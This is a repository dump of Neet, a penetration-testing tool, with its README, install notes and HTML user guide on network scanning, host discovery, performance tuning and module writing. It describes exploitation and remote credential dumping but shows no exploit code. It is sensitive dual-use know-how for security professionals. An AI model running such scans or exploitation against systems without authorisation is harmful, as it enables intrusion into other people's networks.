├── INSTALL ├── LICENSE ├── README.md ├── VERSION ├── content ├── VERSION ├── doc │ ├── .gitignore │ ├── NeetUserGuide.html │ ├── credentials.html │ ├── gsms.html │ ├── guide.html │ ├── hostdiscovery.html │ ├── images │ │ ├── bkg.png │ │ └── blacktocat.png │ ├── index.html │ ├── javascripts │ │ └── main.js │ ├── news.html │ ├── params.json │ ├── performance.html │ ├── quickstart.html │ ├── serviceid.html │ ├── stylesheets │ │ ├── pygment_trac.css │ │ ├── stylesheet-wider.css │ │ └── stylesheet.css │ └── terminology.html ├── install.sh ├── install │ ├── checkdeps.pl │ ├── checkdeps.pm │ ├── coreinstall.sh │ ├── dependencies.conf │ ├── githubVersion │ ├── installsupport │ ├── locations │ ├── messages.dat │ └── pkg │ │ ├── backtrack │ │ ├── debian │ │ ├── debian-8 │ │ ├── kali │ │ ├── kali-1.0 │ │ ├── kali-kali-rolling │ │ ├── linuxmint-17 │ │ ├── linuxmint-17.1 │ │ ├── linuxmint-17.2 │ │ ├── linuxmint-17.3 │ │ ├── linuxmint-18 │ │ ├── ubuntu-12.04 │ │ ├── ubuntu-14.04 │ │ └── ubuntu-16.04 ├── main │ ├── JR │ │ ├── Files │ │ │ └── Config.pm │ │ ├── NetUtils │ │ │ ├── NetUtils.pm │ │ │ ├── Ranges.pm │ │ │ └── WHOIS.pm │ │ ├── Parsers │ │ │ ├── CLI.pm │ │ │ ├── Nmap.pm │ │ │ └── OutputParser.pm │ │ ├── Process │ │ │ ├── RCE.pm │ │ │ ├── RemoteCommandExecution.pm │ │ │ └── ThreadPool.pm │ │ └── iShell │ │ │ ├── ConnectorCPCE.pm │ │ │ ├── ConnectorIISUnicode.pm │ │ │ ├── ConnectorNativeMSSQL.pm │ │ │ ├── ConnectorRCE.pm │ │ │ ├── ConnectorSQLInject.pm │ │ │ ├── OutputIsolator.pm │ │ │ ├── iShell.pm │ │ │ └── iShellSQL.pm │ ├── Neet │ │ ├── API.pm │ │ ├── CredentialManager.pm │ │ ├── GlobalServiceMonitor.pm │ │ ├── Logging.pm │ │ ├── MainScan.pm │ │ ├── OSDetect.pm │ │ ├── ServiceDiscovery.pm │ │ ├── Util.pm │ │ ├── VceConfig.pm │ │ └── threads.pm │ ├── bin │ │ ├── aliases.pl │ │ ├── allTcpPorts │ │ ├── fwdetect │ │ ├── ip2name │ │ ├── memo │ │ ├── neet │ │ ├── neet-update │ │ ├── neet_exploit │ │ ├── netconfig │ │ └── updateLocations │ ├── etc │ │ ├── neet.conf │ │ └── vce.conf │ └── man │ │ ├── neet-qs.1.gz │ │ ├── neet.1.gz │ │ └── neetsh.1.gz └── uninstall.sh └── install.sh /INSTALL: -------------------------------------------------------------------------------- 1 | A quick note: Neet runs on Linux, and is unlikely to work on other operating 2 | systems - I've never tested it on anything else. It most definitely won't work 3 | on Windows, and it's unlikely to work under Cygwin. If you normally use 4 | another OS, just grab yourself a Kali Linux ISO and build yourself a Kali VM 5 | in which to install Neet. It will make life far easier. 6 | 7 | Neet has a significant number of dependencies, largely thanks to the modules 8 | which test various services. However, the installer takes care of most of 9 | the dependency checking for you - if you have missing dependencies then 10 | these will be listed so you can get them from source or using your package 11 | manager of choice. 12 | 13 | Missing critical dependencies will stop the installation. You can redo the 14 | installation once you have satisfied the critical requirements. 15 | 16 | Recommended dependencies will trigger warnings if they are missing, and 17 | they may well break some functionality, but Neet will continue to function. 18 | These will not stop installation, but will be listed in a text file for 19 | you to resolve. 20 | 21 | ** IMPORTANT ** 22 | If you have installed neet and there are unresolved dependencies, run 23 | /opt/neet/bin/updateLocations once you have resolved them. This will 24 | ensure that the functionality for which they are required will be 25 | configured to use them. 26 | 27 | Having said all that, installation of Neet is pretty simple on most 28 | modern distributions, and if you use Kali or Backtrack, the installer 29 | will pre-fetch certain dependencies for you as long as you have a 30 | working Internet connection that your package manager can use. In these 31 | cases installation is an extremely simple process. 32 | 33 | In all cases, start the installation process by running "./install.sh" 34 | as root. 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | NEET - Network Enumeration and Exploitation Tool 2 | 3 | Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way. 4 | 5 | Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories. 6 | 7 | It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day. 8 | 9 | Neet has a simple and flexible command-line interface, and gathers a lot of data about the networks within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose. 10 | 11 | All the information gathered is stored in human-readable text files so they can be grepped and awked as the user sees fit and, as well as storing the raw data, Neet aggregates a lot of it into files of related information for easier processing. 12 | 13 | There's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple commands. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live Windows hosts, and the testshares command checks for unauthenticated access to SMB shares. 14 | 15 | There is also documentation. Check out the man pages, the help command inside the neet shell, and the HTML documentation in /opt/neet/doc. Also, please check out the project page for the latest news and issue tracking/feature requests. 16 | 17 | In summary, Neet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain insight into the components, relationships and operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible. 18 | 19 | Neet is released under version 3 of the GNU Public License. See the LICENSE file for details. 20 | 21 | Copyright 2008-2016 Jonathan Roach 22 | Email: jonnyhightower [at] funkygeek.com 23 | 24 | Some of the main features include: 25 | 26 | Single interface to co-ordinate many tools; 27 | 28 | Port scans and service identification are done in batches, so useful results appear early on; 29 | 30 | Easy to specify ranges to include and exclude, both for IP addresses and ports; 31 | 32 | Doesn't create more traffic than is strictly necessary; 33 | 34 | Detailed, timestamped logging; 35 | 36 | All raw tool output available, as well as sensibly-arranged output in text format; 37 | 38 | Customisable speed and intensity; 39 | 40 | Reliable scanning from multiple interfaces and over VPNs; 41 | 42 | Scan control allows you to pause / resume the scan; 43 | 44 | Cancel scans on individual hosts; 45 | 46 | Monitor progress of the scanning; 47 | 48 | Very configurable; 49 | 50 | Neet shell (neetsh) is bash shell with many aliases for getting through results quickly; 51 | 52 | Exploitation for specific exploits included in the Neet shell; 53 | 54 | Dump credentials from remote hosts directly into your Neet results without manually shunting files and commands between machines; 55 | 56 | Online incremental updates without having to do a full reinstall each time; 57 | 58 | Documentation: man pages, HTML help and the help command in the Neet shell; 59 | 60 | Many more. 61 | 62 | ** INSTALLATION ** 63 | 64 | Owing to the number of open-source tools orchestrated by Neet, the installation process will check the target system to ensure that it has the tools required. For the Debian, Ubuntu, Kali and Mint Linux distributions, the required prerequisites will be installed using APT prior to the main installation process. 65 | 66 | See the INSTALL file for installation instructions. 67 | 68 | -------------------------------------------------------------------------------- /VERSION: -------------------------------------------------------------------------------- 1 | 1.2.7 2 | -------------------------------------------------------------------------------- /content/VERSION: -------------------------------------------------------------------------------- 1 | 1.2.7 2 | -------------------------------------------------------------------------------- /content/doc/.gitignore: -------------------------------------------------------------------------------- 1 | C\:\\nppdf32Log\\debuglog.txt 2 | docnotes.txt 3 | C:\nppdf32Log\debuglog.txt 4 | bugsAndPlanning.html 5 | NeetUserGuide.html 6 | -------------------------------------------------------------------------------- /content/doc/gsms.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Neet User Guide: Global Service Monitors 12 | 13 | 14 |
15 |
16 |

Neet User Guide

17 |

The Global Service Monitors (GSMs)

18 | 19 | 24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |

The Global Service Monitors are the modules which test each service as it is recorded (provided there is enough spare budget; if there isn't then the service is queued). They are Perl modules and loaded into memory when neet starts by the GlobalServiceMonitor.pm core neet module. They are run in a strict environment, and any modules which fail to parse properly are not loaded; the failure is logged, although neet will function as normal without the broken module. Obviously whichever functionality the module was meant to provide will be missing from the scans.

32 | 33 |

The simplest way to add a new module is to change into the /opt/neet/modules/ directory and copy the Template.gsm.temp file, renaming it to reflect the function of the module. The Global Service Monitor handler module will attempt to load any file in this directory that has the .gsm extension, which is the reason for the template module having a .temp extension.

34 | 35 |

The template module is well commented, and it should be fairly simply to configure the options near the top of the script. There are a few rules which must be followed:

36 | 41 | 42 |

The template module contains all of the code necessary for the module to function properly within neet, including the advanced functionality such as pause/resume, multi-threading, budget control and queueing etc. All that needs to be added is the test-specific code, which should be inserted into the activate() function, where the CODE GOES HERE banner is found.

43 | 44 |

There is an API reference in the comments of that section, so you will know what information is already available to your module and how to record vulnerabilities and other messages, and log in a standard way that does not cause havoc with file locks.

45 | 46 |
47 |
48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /content/doc/guide.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Neet: User Guide 12 | 13 | 14 | 15 | 16 |
17 |
18 |

Neet User Guide

19 |

What Neet does and how it does it

20 | 21 | 25 | 26 |
27 |
28 | 29 |
30 |
31 | 32 |

This user guide aims to help you get started using Neet quickly. As well as giving you some quick start tips, the guide contains a detailed reference explaining the methodologies used and performance tuning hints.

33 | 34 |

Table of contents

35 |

Basic Usage

36 | 42 |

More in-depth

43 | 49 |

As yet unwritten but in progress...

50 | 55 | 56 | 57 |
58 |
59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /content/doc/hostdiscovery.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Neet User Guide: Host Discovery 12 | 13 | 14 |
15 |
16 |

Neet User Guide

17 |

How Neet discovers hosts

18 | 19 | 24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |

The discovery method for target hosts is dependent on each host's proximity to the scanning host. Neet begins with two broad-brushed types of host: local and remote. Remote hosts are further classed as internet, if the -I (–internet) option was passed on the command line, or vpn, if they are accessed via an interface type listed in the Internet.VPN parameter in the config file.

32 | 33 |

Local Discovery

34 | 35 |

Neet uses ARP for discovery of targets which lie within the address ranges of a local interface, and classes them as local hosts. Where network ranges are specified as addresses, each target is discovered individually, immediately prior to port-scanning. Where network interfaces are specified, the entire network ranges for the interfaces are ARP-scanned, and the respondents deemed to be the targets.

36 | 37 |

For addresses, or ranges of addresses, neet calculates the locality of each target on an individual basis at scan time. It is conceivable that there could be a mix of local and non-local hosts in the same scan.

38 | 39 |

Remote Discovery

40 | 41 |

Hosts that are remote are those which are accessed through a gateway. The reliability of ARP as a detection mechanism is not available and therefore hosts are assumed as being UP all the way through the scans. This can mean scans take a long time: if a large address space is being scanned and there are not many live hosts present, a lot of time will be taken up scanning empty address space, using time and SDM threads that would be more usefully deployed on live hosts. However, from a thorough discovery point of view, the full scans must be completed on each host to provide maximum assurance that there isn't a host listening on just one obscure high-end port.

42 | 43 |

The -p (–pingscan) option can be used to accelerate host discovery in such situations: hosts will only be considered live if they respond to an ICMP Echo request or a TCP connection attempt to TCP/80. If there is no response to either probe, the host will be considered down and no more scanning of that address will take place.

44 | 45 |

The difficulty is that it is common for hosts to be firewalled off, and it should be confirmed with the network administrators whether hosts are likely to respond to such ping requests or not. If some hosts are deployed with host-based firewalls, this scan is likely to miss those hosts.

46 | 47 |

An alternative option in such circumstances is a recent addition to neet: the –limited-patience (-l) option. This applies only to non-local hosts - those which cannot be discovered using ARP. Limited Patience is a mode in which Neet assumes that all hosts are up for the duration of the named ranges scans. However, hosts which haven't responded to either TCP, UDP or ICMP by the end of the named range scans, are considered to be down, and are ignored from that point on. This frees up SDM threads to move on to scan the next addresses in the target range, and ultimately means that progress through the network address space is far quicker.

48 | 49 |

Bear in mind that with this convenience there is an implicit risk that hosts which expose only services that are outside the ports in the named ranges will be incorrectly classified as dead, and the live services overlooked. The operator should make a judgement call as to whether this is an acceptable risk based on discussions with the local network team, the scope of work and the available time.

50 | 51 |

VPN and Internet hosts are discovered in the same way as remote hosts. The only difference in their treatment is the differing speed and intensity profiles selected depending on their location. These profiles are all contained within the configuration file /opt/neet/etc/neet.conf.

52 | 53 |
54 |
55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /content/doc/images/bkg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/doc/images/bkg.png -------------------------------------------------------------------------------- /content/doc/images/blacktocat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/doc/images/blacktocat.png -------------------------------------------------------------------------------- /content/doc/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Neet, Network Enumeration and Exploitation Tool: Project Page 12 | 13 | 14 | 15 | 16 |
17 |
18 |

Neet

19 |

Neet Project Page

20 | 21 |
22 | View Neet on GitHub 23 | Download the latest release 24 |
25 | 32 |
33 |
34 | 35 |
36 |
37 |

Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way.

38 | 39 |

Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories.

40 | 41 |

It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.

42 | 43 |

Neet has a simple and flexible command-line interface, and gathers a lot of data about the networks within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose.

44 | 45 |

All the information gathered is stored in human-readable text files so they can be grepped and awked as the user sees fit and, as well as storing the raw data, Neet aggregates a lot of it into files of related information for easier processing.

46 | 47 |

There's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple commands. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live Windows hosts, and the testshares command checks for unauthenticated access to SMB shares.

48 | 49 |

There is also documentation. Check out the man pages, the help command inside the neet shell, and the HTML Wiki document in /opt/neet/doc. Also, please check out the project page for the latest news and issue tracking/feature requests.

50 | 51 |

52 | In summary...

53 | 54 |

Neet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain insight into the components, relationships and operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible.

55 | 56 |

Neet is released under version 3 of the GNU Public License. See the LICENSE file for details.

57 | 58 |

Copyright 2008-2016 Jonathan Roach 59 | Email: jonnyhightower [at] funkygeek.com

60 | 61 |

Some of the main features include:

62 | 63 |

84 | INSTALLATION

85 | 86 |

Owing to the number of open-source tools orchestrated by Neet, the installation process will check the target system to ensure that it has the tools required. For the Ubuntu and Kali Linux distributions, the required prerequisites will be installed using APT prior to the main installation process.

87 | 88 |

See the INSTALL file for installation instructions.

89 |
90 |
91 | 92 | 93 | 94 | 95 | -------------------------------------------------------------------------------- /content/doc/javascripts/main.js: -------------------------------------------------------------------------------- 1 | console.log('This would be the main JS file.'); 2 | -------------------------------------------------------------------------------- /content/doc/params.json: -------------------------------------------------------------------------------- 1 | {"name":"Neet","tagline":"Neet - Network Enumeration and Exploitation Tool","body":"Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure, You might want to try it out if you fall into one of those categories.\r\n\r\nIt has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.\r\n\r\nNeet has a simple (though powerful and flexible) command-line interface, and gathers a lot of data about the network within its scope. It will give you an up-to-the second view of how many services it's found on the network, what types of services they are, what types of hosts, what their hostnames are, whether they belong to domains, etc. If the modules are enabled (as they are by default) then it will perform tests against certain services - looking for default SNMP community strings and enumerating whatever is possible from SMB services, for example. It will also check for glaring security vulnerabilities and allow you to exploit them if you so choose.\r\n\r\nIt's not magic, but it does what it says on the tin: network enumeration and exploitation. All the information gathered is stored in plain text files, so they can be grepped and awked as the user sees fit, although as well as storing the raw data, it does aggregate a lot of it into files of related information for easy processing.\r\n\r\nThere's also a customised shell which takes a lot of the common tasks you'd normally perform and rolls them into simple tasks. For example, the win command lists the Windows hosts on the network, and cross-references them against issues and vulnerabilities found to give you a colour-coded list of live hosts.\r\n\r\nAnd there's documentation too! Check out the man pages, the help command inside the neet shell, and the HTML Wiki document in /opt/neet/doc. Also, please check out [the wiki](https://github.com/JonnyHightower/neet/wiki) for the latest news and issue tracking/feature requests.\r\n\r\n###In other words...\r\n\r\nNeet is a flexible, multi-threaded network penetration test tool which runs on Linux and co-ordinates the use of numerous other open-source network tools to gather as much network information as possible in an easily-understood format. The core identifies network services, the modules test or enumerate those services, and the neet shell provides an integrated environment for processing the results and exploiting known vulnerabilities.\r\n\r\nAs such, Neet sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated VA tool. Neet has many options which allow the user to tune the test parameters for network scanning in the most reliable and practical way.\r\n\r\nNeet is not a point-and-click hacking or vulnerability assessment tool. It is a console-based environment best run under X Windows, designed for the operator to gain a great deal of insight into the operation of the network under test. It is also designed to help reporting by gathering as much evidence as possible. \r\n\r\nOwing to the number of open-source tools orchestrated by Neet, the installation process will check the target system to ensure that it has the tools required.\r\n\r\n***\r\nNeet is released under version 3 of the GNU Public License. See the LICENSE file for details.\r\n\r\nCopyright 2008-2016 Jonathan Roach\r\nEmail: jonnyhightower [at] funkygeek.com\r\n\r\nSome of the main features include:\r\n\r\n* Single interface to co-ordinate many tools;\r\n* Port scans and service identification are done in batches, so useful results appear early on;\r\n* Easy to specify ranges to include and exclude, both for IP addresses and ports;\r\n* Doesn't create more traffic than is strictly necessary;\r\n* Detailed, timestamped logging;\r\n* All raw tool output available, as well as sensibly-arranged output in text format;\r\n* Customisable speed and intensity;\r\n* Reliable scanning from multiple interfaces and over VPNs;\r\n* Scan control allows you to pause / resume the scan;\r\n* Cancel scans on individual hosts;\r\n* Monitor progress of the scanning;\r\n* Very configurable;\r\n* Neet shell (neetsh) is bash shell with many aliases for getting through results quickly;\r\n* Exploitation for specific exploits included in the Neet shell;\r\n* Dump credentials from remote hosts directly into your Neet results without manually shunting files and commands between machines;\r\n* Online incremental updates without having to do a full reinstall each time;\r\n* Documentation! man pages and \"help\" command in the Neet shell;\r\n*Many more.\r\n\r\n###INSTALLATION\r\n\r\nSee the INSTALL file for installation instructions.\r\n\r\n","google":"","note":"Don't delete this file! It's used internally to help with page regeneration."} -------------------------------------------------------------------------------- /content/doc/performance.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Neet User Guide: Performance 12 | 13 | 14 |
15 |
16 |

Neet User Guide

17 |

Tweaking the performance of your scans

18 | 19 | 24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |

Without some kind of resource limits, neet would consume all available resources to complete the scans as quickly as possible. In practice, this would result in the scanning host becoming unresponsive, especially if other resource-intensive applications - such as Virtual Machines - were running on the same host. To combat this, neet uses a cost/budget system to prevent new scans starting when the available resources have been assigned.

32 | 33 |

When neet starts, it has a default budget figure which has been set in the configuration file or on the command line. Each scan thread has a notional cost assigned to it: each Service Discovery Module thread for example has a cost of 10, whilst each Global Service Monitor module has a cost assigned which relates to the resources it consumes - the more resource intensive, the higher the cost. The GSM costs are allocated by the module authors and are coded into the modules.

34 | 35 |

When neet starts any scan, its cost is deducted from the available budget, and returned to the budget when the scan finishes. If the scheduler wants to start a scan but the budget has been used, the scan is queued until budget becomes available again. The budget can be manually adjusted during the scan from the neet shell, to compensate for under- or over-loading of the scanning host. Increasing the budget will immediately allow some of the queued scans to be started, up to the new budget figure. Decreasing the budget will prevent new scans starting until enough existing scans have finished to release some budget again.

36 | 37 |

However, the budget is automatically trimmed, both upwards and downwards, based the system's load average. If the system is underloaded, the budget is gradually increased to allow more scans to run simultaneously, using up spare capacity. Conversely, if the system is overloaded, the budget is reduced. This will prevent new scans from starting until existing scans have finished and the scanning cost meets the new budget. In this way, the load on the system is reduced. This automatic trimming of the budget can be disabled on the command line prior to starting a scan.

38 | 39 |

In-Scan Tuning

40 | 41 | TO BE COMPLETED 42 | 43 |
44 |
45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /content/doc/quickstart.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Neet User Guide: Getting started 12 | 13 | 14 |
15 |
16 |

Neet User Guide

17 |

Getting started

18 | 19 | 24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |

Internal Network Scans

32 | 33 |

The most common type of scan you will run with neet is simply 'neet range' , where range is some IP address range on an internal network somewhere.

34 | 35 | 
neet 10.24.25.129/25
36 | 37 |

This will set up a scan which incorporates all modules and functionality. The user will be shown the test parameters, and asked to accept them before the scan commences. Once the scan is running, neet will show an overview of the test progression, highlighting issues and vulnerabilities found. You can interact with the results in a regular system shell, but the easiest way is to use the neet shell (see Neet Terminology), which has a lot of useful functionality.

38 | 39 |

Scanning ranges can be specified in a number of formats. For example, the above range could alternatively be expressed as 10.24.25.129-254, excluding network and broadcast addresses (these special addresses will be automatically excluded from scan ranges which have been specified using CIDR notation).

40 | 41 |

Ranges may be specified within any IPv4 octet. For example, 10.24.25-28.129-254.

42 | 43 |

If you want to scan the entire subnet to which your machine is connected, the quickest method is usually to specify the relevant network interface(s). For example, to scan everything connected to eth0, just use neet eth0. Specifying a network interface to scan from causes neet to perform a network-wide ARP scan of the address range in which the interface is configured, and then target only the hosts which provided an ARP response. All other address specification types cause neet to perform appropriate host discovery on a per-address basis.

44 | 45 |

Neet will happily scan from multiple interfaces simultaneously, choosing the best interface for each target based on the host's routing table. It is perfectly valid to express multiple target ranges in mixed formats. In the following example there are three separate address ranges being scanned in the same scan run:

46 | 47 | 
neet wlan0 192.168.1-10.1-254 eth1
48 | 49 |

To view all the available command-line options, run neet in a fresh directory with no options, or with the -h (–help) option. Alternatively, see the neet man page or the Scanning Options section.

50 | 51 |

Scanning Internet Hosts

52 | 53 |

Neet usage in these cases is very similar to non-Internet scans, except that the -I (–internet) flag should be specified on the command line to indicate Internet mode (see Neet Terminology). The user will be shown WHOIS records of the target address range(s), and asked to confirm that they have permission to test the targets before the test will start.

54 | 55 |

In Internet mode, or when scanning any group of non-local hosts you may wish to tune the criteria used to determine when a host is considered dead or alive, as non-local hosts are likely to be filtered and cannot be reached via ARP. This is discussed in the Host Discovery section.

56 | 57 |

Excluding Operating Systems

58 | 59 |

Neet allows you to exclude hosts from further scanning based on the operating system detected. For example, if a client tells you not to bother scanning their 250 XP workstations as they are being decommissioned next week, you can use the -O (--exclude-os) option to achieve this, specifying a regex that will match some unique part of the OS name. For example: 

neet eth0 --exclude-os=XP
This would initially cause all machines on the eth0 network to be scanned. However, scans will be stopped on any machines identified as running Windows XP as soon as the OS identification is made.

60 | 61 |
62 |
63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /content/doc/stylesheets/pygment_trac.css: -------------------------------------------------------------------------------- 1 | .highlight .c { color: #999988; font-style: italic } /* Comment */ 2 | .highlight .err { color: #a61717; background-color: #e3d2d2 } /* Error */ 3 | .highlight .k { font-weight: bold } /* Keyword */ 4 | .highlight .o { font-weight: bold } /* Operator */ 5 | .highlight .cm { color: #999988; font-style: italic } /* Comment.Multiline */ 6 | .highlight .cp { color: #999999; font-weight: bold } /* Comment.Preproc */ 7 | .highlight .c1 { color: #999988; font-style: italic } /* Comment.Single */ 8 | .highlight .cs { color: #999999; font-weight: bold; font-style: italic } /* Comment.Special */ 9 | .highlight .gd { color: #000000; background-color: #ffdddd } /* Generic.Deleted */ 10 | .highlight .gd .x { color: #000000; background-color: #ffaaaa } /* Generic.Deleted.Specific */ 11 | .highlight .ge { font-style: italic } /* Generic.Emph */ 12 | .highlight .gr { color: #aa0000 } /* Generic.Error */ 13 | .highlight .gh { color: #999999 } /* Generic.Heading */ 14 | .highlight .gi { color: #000000; background-color: #ddffdd } /* Generic.Inserted */ 15 | .highlight .gi .x { color: #000000; background-color: #aaffaa } /* Generic.Inserted.Specific */ 16 | .highlight .go { color: #888888 } /* Generic.Output */ 17 | .highlight .gp { color: #555555 } /* Generic.Prompt */ 18 | .highlight .gs { font-weight: bold } /* Generic.Strong */ 19 | .highlight .gu { color: #800080; font-weight: bold; } /* Generic.Subheading */ 20 | .highlight .gt { color: #aa0000 } /* Generic.Traceback */ 21 | .highlight .kc { font-weight: bold } /* Keyword.Constant */ 22 | .highlight .kd { font-weight: bold } /* Keyword.Declaration */ 23 | .highlight .kn { font-weight: bold } /* Keyword.Namespace */ 24 | .highlight .kp { font-weight: bold } /* Keyword.Pseudo */ 25 | .highlight .kr { font-weight: bold } /* Keyword.Reserved */ 26 | .highlight .kt { color: #445588; font-weight: bold } /* Keyword.Type */ 27 | .highlight .m { color: #009999 } /* Literal.Number */ 28 | .highlight .s { color: #d14 } /* Literal.String */ 29 | .highlight .na { color: #008080 } /* Name.Attribute */ 30 | .highlight .nb { color: #0086B3 } /* Name.Builtin */ 31 | .highlight .nc { color: #445588; font-weight: bold } /* Name.Class */ 32 | .highlight .no { color: #008080 } /* Name.Constant */ 33 | .highlight .ni { color: #800080 } /* Name.Entity */ 34 | .highlight .ne { color: #990000; font-weight: bold } /* Name.Exception */ 35 | .highlight .nf { color: #990000; font-weight: bold } /* Name.Function */ 36 | .highlight .nn { color: #555555 } /* Name.Namespace */ 37 | .highlight .nt { color: #CBDFFF } /* Name.Tag */ 38 | .highlight .nv { color: #008080 } /* Name.Variable */ 39 | .highlight .ow { font-weight: bold } /* Operator.Word */ 40 | .highlight .w { color: #bbbbbb } /* Text.Whitespace */ 41 | .highlight .mf { color: #009999 } /* Literal.Number.Float */ 42 | .highlight .mh { color: #009999 } /* Literal.Number.Hex */ 43 | .highlight .mi { color: #009999 } /* Literal.Number.Integer */ 44 | .highlight .mo { color: #009999 } /* Literal.Number.Oct */ 45 | .highlight .sb { color: #d14 } /* Literal.String.Backtick */ 46 | .highlight .sc { color: #d14 } /* Literal.String.Char */ 47 | .highlight .sd { color: #d14 } /* Literal.String.Doc */ 48 | .highlight .s2 { color: #d14 } /* Literal.String.Double */ 49 | .highlight .se { color: #d14 } /* Literal.String.Escape */ 50 | .highlight .sh { color: #d14 } /* Literal.String.Heredoc */ 51 | .highlight .si { color: #d14 } /* Literal.String.Interpol */ 52 | .highlight .sx { color: #d14 } /* Literal.String.Other */ 53 | .highlight .sr { color: #009926 } /* Literal.String.Regex */ 54 | .highlight .s1 { color: #d14 } /* Literal.String.Single */ 55 | .highlight .ss { color: #990073 } /* Literal.String.Symbol */ 56 | .highlight .bp { color: #999999 } /* Name.Builtin.Pseudo */ 57 | .highlight .vc { color: #008080 } /* Name.Variable.Class */ 58 | .highlight .vg { color: #008080 } /* Name.Variable.Global */ 59 | .highlight .vi { color: #008080 } /* Name.Variable.Instance */ 60 | .highlight .il { color: #009999 } /* Literal.Number.Integer.Long */ 61 | 62 | .type-csharp .highlight .k { color: #0000FF } 63 | .type-csharp .highlight .kt { color: #0000FF } 64 | .type-csharp .highlight .nf { color: #000000; font-weight: normal } 65 | .type-csharp .highlight .nc { color: #2B91AF } 66 | .type-csharp .highlight .nn { color: #000000 } 67 | .type-csharp .highlight .s { color: #A31515 } 68 | .type-csharp .highlight .sc { color: #A31515 } 69 | -------------------------------------------------------------------------------- /content/doc/stylesheets/stylesheet-wider.css: -------------------------------------------------------------------------------- 1 | body { 2 | margin: 0; 3 | padding: 0; 4 | background: #151515 url("../images/bkg.png") 0 0; 5 | color: #eaeaea; 6 | font: 16px; 7 | line-height: 1.5; 8 | font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; 9 | } 10 | 11 | /* General & 'Reset' Stuff */ 12 | 13 | .container { 14 | width: 90%; 15 | max-width: 800px; 16 | margin: 0 auto; 17 | } 18 | 19 | section { 20 | display: block; 21 | margin: 0 0 20px 0; 22 | } 23 | 24 | h1, h2, h3, h4, h5, h6 { 25 | margin: 0 0 20px; 26 | } 27 | 28 | li { 29 | line-height: 1.4 ; 30 | } 31 | 32 | /* Header,
